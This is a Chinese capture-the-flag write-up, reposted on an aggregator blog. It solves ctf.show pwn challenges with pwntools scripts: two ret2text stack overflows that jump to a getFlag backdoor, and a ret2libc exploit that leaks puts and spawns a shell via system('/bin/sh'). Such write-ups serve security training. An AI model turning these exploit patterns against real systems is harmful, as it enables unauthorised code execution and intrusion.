PWN-PRACTICE-CTFSHOW-2
生活随笔
收集整理的這篇文章主要介紹了
PWN-PRACTICE-CTFSHOW-2
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
PWN-PRACTICE-CTFSHOW-2
- pwn05
- pwn06
- pwn07
- 01棧溢出之ret2text
pwn05
棧溢出,覆蓋返回地址為后門函數getFlag起始地址即可
# -*- coding:utf-8 -*- from pwn import * context.log_level="debug" #io=process("./pwn1") io=remote("pwn.challenge.ctf.show",28091) elf=ELF("./pwn1")getFlag=0x08048486 payload="a"*0x14+"bbbb"+p32(getFlag) io.sendline(payload)io.interactive()pwn06
棧溢出,覆蓋返回地址為后門函數getFlag起始地址即可
# -*- coding:utf-8 -*- from pwn import * context.log_level="debug" #io=process("./pwn1") io=remote("pwn.challenge.ctf.show",28011) elf=ELF("./pwn1")getFlag=0x400577 ret=0x40044e payload="a"*0xC+"b"*8+p64(ret)+p64(getFlag) io.sendline(payload)io.interactive()pwn07
棧溢出,ret2libc
# -*- coding:utf-8 -*- from pwn import * context.log_level="debug" #io=process("./pwn1") io=remote("pwn.challenge.ctf.show",28098) elf=ELF("./pwn1")puts_got=elf.got["puts"] puts_plt=elf.plt["puts"] main_addr=0x40061F pop_rdi=0x4006e3 ret=0x4004c6#gdb.attach(io,"b * 0x40061D") #pause()payload="a"*0xc+"b"*8+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(main_addr) io.sendline(payload) puts_addr=u64(io.recvuntil("\x7f")[-6:].ljust(8,"\x00")) print("puts_addr=="+hex(puts_addr)) libc_base=puts_addr-0x0809c0 system=libc_base+0x04f440 binsh=libc_base+0x1b3e9apayload="a"*0xc+"b"*8+p64(pop_rdi)+p64(binsh)+p64(ret)+p64(system)+p64(main_addr) io.sendline(payload)#pause()io.interactive()01棧溢出之ret2text
棧溢出
覆蓋返回地址為后門函數ctfshow起始地址即可
總結
以上是生活随笔為你收集整理的PWN-PRACTICE-CTFSHOW-2的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: PC拒绝牙膏!PCIe 7.0官宣:速度
- 下一篇: 热血江湖最新服务器,《热血江湖》2020